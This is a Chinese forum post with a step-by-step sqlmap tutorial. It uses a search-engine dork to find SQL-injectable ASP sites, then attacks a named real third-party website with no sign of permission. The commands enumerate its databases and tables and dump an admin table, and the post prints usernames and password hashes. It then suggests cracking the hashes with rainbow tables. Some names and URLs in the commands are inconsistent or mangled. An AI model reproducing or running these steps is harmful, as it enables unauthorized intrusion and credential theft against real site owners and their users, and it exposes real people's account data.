请选择 进入手机版 | 继续访问电脑版
查看: 128|回复: 3

[黑科技] 【黑科技】手把手带你使用SQLMAP工具快速实战PHP网站渗透测试SQL注入漏洞检测

[复制链接]

1

主题

5

帖子

22

积分

新手上路

Rank: 1

积分
22
发表于 2018-12-22 14:16:26 | 显示全部楼层 |阅读模式
操作步骤如下:
1:使用谷歌或者百度搜索有SQL注入的漏洞的网站。
我们选用任意一个网站搜索引擎,输入下面的内容
[Shell] 纯文本查看 复制代码
inurl:common.asp?id=



输入搜索就会出现下面的内容信息。
00.jpg


当然这个搜索是针对于asp网站的,你也可以修改上面的内容来搜索php或者jsp这些网站,下面列出来的结果可能就是存在SQL注入漏洞的网站的。


2.我们这里选择了一个网站。
[Shell] 纯文本查看 复制代码
http://www.tdsi.com.cn/common.asp?id=20

00.jpg


这个网站就是可能存在SQL注入漏洞的网站。
然后开始检测漏洞。


[JavaScript] 纯文本查看 复制代码
检测漏洞:sqlmap -u "http://www.tdsi.com.cn/common.asp?id=20"



3. 开始检查是否具有DBA权限。
[Shell] 纯文本查看 复制代码
检查是否为DBA权限:sqlmap -u "http://www.tdsi.com.cn/common.asp?id=20" -is-dba



4. 接下来开始列出这个网站所有的数据库。
[Shell] 纯文本查看 复制代码
sqlmap -u "http://www.tdsi.com.cn/common.asp?id=20" --dbs

运行上面的命令显示结果如下:
current database: "ggcc"



5. 开始拆解数据库:(database 首字母大写, 根据“ggec”这个数据库来拆分,拆出来(查询)所有的tables)
[Shell] 纯文本查看 复制代码
sqlmap -u "http://com.cn/common.asp?id=20" --tables -D "ggec"

运行上面的命令查询结果如下:
ggec_admin


6. 继续拆分:sqlmap -u "http://com.cn/commo,n.asp?id=20" --columns -T "ggec_admin" -D "ggec"
[4 entries]
+----+------------+----------+----------------------------------+
| id | admin      | keywords | password                         |
+----+------------+----------+----------------------------------+
| 10 | yanglichao | <blank>  | bfb6ec92c1eb31c0f90beb39fef401be |                           
| 6  | liulidong  | <blank>  | d3594ff6527704db617e486dbe22c692 |               
| 8  | caiwei     | <blank>  | 8f4caa156457158279eb7ea346acb96b |               
| 9  | liangbo    | <blank>  | fea2debb1c072e249e7cfc99166ce929 |               
+----+------------+----------+----------------------------------+



我们竟然发现神器的事情出现了,这个用户表的所有字段信息已经被我们全部拆解出来的,只不过发现密码是加密过的,猜测是使用MD5加密的,我们直接去彩虹表里面反向解密即可,。


00.jpg


此时我们就使用这种方式完成了整个网站的暴力破解以及SQL注入漏洞的检测。




上一篇:【编程艺术】全网最新的PHP从前端到后台打造企业网站视频教程(项目实战+企业面试)
下一篇:【语文教材】2018最新出品小学一年级-六年级所有语文教材人教版电子版PDF可打印版
发帖求助前要善用【论坛搜索】功能,那里可能会有你要找的答案; 如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】。
回复过本主题
的还回复过:

0

主题

10

帖子

24

积分

新手上路

Rank: 1

积分
24
发表于 2018-12-23 19:21:52 | 显示全部楼层
感谢分享!
发帖求助前要善用【论坛搜索】功能,那里可能会有你要找的答案; 如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】。
回复

使用道具 举报

1

主题

9

帖子

26

积分

新手上路

Rank: 1

积分
26
发表于 2018-12-30 13:07:18 | 显示全部楼层
很牛逼
发帖求助前要善用【论坛搜索】功能,那里可能会有你要找的答案; 如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】。
回复

使用道具 举报

1

主题

5

帖子

17

积分

新手上路

Rank: 1

积分
17
发表于 2019-1-1 18:41:23 | 显示全部楼层
感谢分享技术
发帖求助前要善用【论坛搜索】功能,那里可能会有你要找的答案; 如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

微信扫一扫

我爱科技论坛(www.52tech.tech)旨在打造全网最大的免费资源共享平台。目前论坛包括考研资料、编程学习、黑科技/科学上网、开源软件等资源模块,竭力服务于正在学习道路上的每一个人。我爱科技论坛,爱科技,更爱分享。致力于营造一个资源丰富、内容完善的大型网络学习交流资源共享平台!

QQ|Archiver|手机版|小黑屋|我爱科技论坛 快乐学习交流

(请勿发布违反中华人民共和国法律法规的言论,会员观点不代表我爱科技论坛的官方立场)

Powered by Discuz! X3.4© 2001-2013 Technology Inc.

返回顶部 返回列表